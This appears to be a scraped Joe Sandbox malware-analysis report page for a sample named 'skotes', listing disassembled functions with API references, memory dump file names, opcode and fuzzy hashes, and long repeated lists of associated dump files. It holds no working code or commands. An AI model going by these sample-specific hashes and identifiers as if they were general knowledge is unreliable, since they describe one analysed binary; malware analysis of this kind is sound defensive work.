Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 59178071742ecea7cdb722ee0d2f8c74cb9ea7257ed705b22d98b10925a8811d
Instruction ID: 33de0de13c917e6942ea72600df7709c01ac6fe950007bfbdc2c7336e758c01d
Opcode Fuzzy Hash: 59178071742ecea7cdb722ee0d2f8c74cb9ea7257ed705b22d98b10925a8811d
Instruction Fuzzy Hash: D2517131A00205DBCF28DF50C899BEDB775AF44711F144069ED066B396CBB9AF09CBA1

Function 0074CB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0074CBAA

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 3a55397ffe63e2116ac0204738d87a9117a2dbbadb7a16d00f922ef70f556bfa
Instruction ID: 94e5d324edd30af904e86508c5498d43ce9eb760d8b1fae5fa97c8acb41ca8f1
Opcode Fuzzy Hash: 3a55397ffe63e2116ac0204738d87a9117a2dbbadb7a16d00f922ef70f556bfa
Instruction Fuzzy Hash: E3B09232A1383047CA932B14BC0859D7714AE80E2130A8156D801A7224CB5E1D868BD8

Function 04DB0290 Relevance: 1.4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

Strings

C:4, xrefs: 04DB02EF

Memory Dump Source

Source File: 00000005.00000002.3486029794.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4db0000_skotes.jbxd

Similarity

API ID:
String ID: C:4
API String ID: 0-1570641955
Opcode ID: 5e9190af7b016f94ff7caa7ecefecd528dd62ebf2b620b203ba2826b9338bbc2
Instruction ID: 485f8852f00c7ffbb8143fc440fc22f14915f67a977ae89033b8a23e21fcae38
Opcode Fuzzy Hash: 5e9190af7b016f94ff7caa7ecefecd528dd62ebf2b620b203ba2826b9338bbc2
Instruction Fuzzy Hash: 6441E7EB34C361FEA54381912B58AF76B5DE5C32303348466F8C7D7647F289EA4921B1

Function 0074DD91 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dab531e67572cb0d1c7eae5c8476125e9f60509317aa4467a1319214fedad529
Instruction ID: 2c54011d544e8e0b78ac8264ff5aafb3628ca488ca039fe6b24a25f5f5a8c7a6
Opcode Fuzzy Hash: dab531e67572cb0d1c7eae5c8476125e9f60509317aa4467a1319214fedad529
Instruction Fuzzy Hash: 4251CDB2A02616CBDB25CF58D8947AEBBF1FB48310F24C56AC449EB251D338AD01CF94

Function 0074F028 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0074F2BB

Strings

pEvents, xrefs: 0074F2B3

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 39c44d60daf27ebc0e83b82af21eca2b77b00d60cb64606527b677e30c54a6dc
Instruction ID: 21eba6c29e1abd53153179c98775c5cdf683cef93266ecbbeabed4df194dd2c6
Opcode Fuzzy Hash: 39c44d60daf27ebc0e83b82af21eca2b77b00d60cb64606527b677e30c54a6dc
Instruction Fuzzy Hash: B1819C31D40219DFDF25DFA8C989BAEB7B5BF45310F144129E801A7282DB7CAE45CBA1

Function 007626D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 007626E3

Part of subcall function 007624E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00762504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00762704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00762711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0076275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 007627E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 007627F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00762846

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 0cbd3a7b52c80ebd8c15d3f8a123a20f7ce1a04fee2eaa8d27137d8b39c86070
Instruction ID: 6a4690fe84fa065d7e6cee368796d2aaaa3cf720ca03b748353b084e215ca457
Opcode Fuzzy Hash: 0cbd3a7b52c80ebd8c15d3f8a123a20f7ce1a04fee2eaa8d27137d8b39c86070
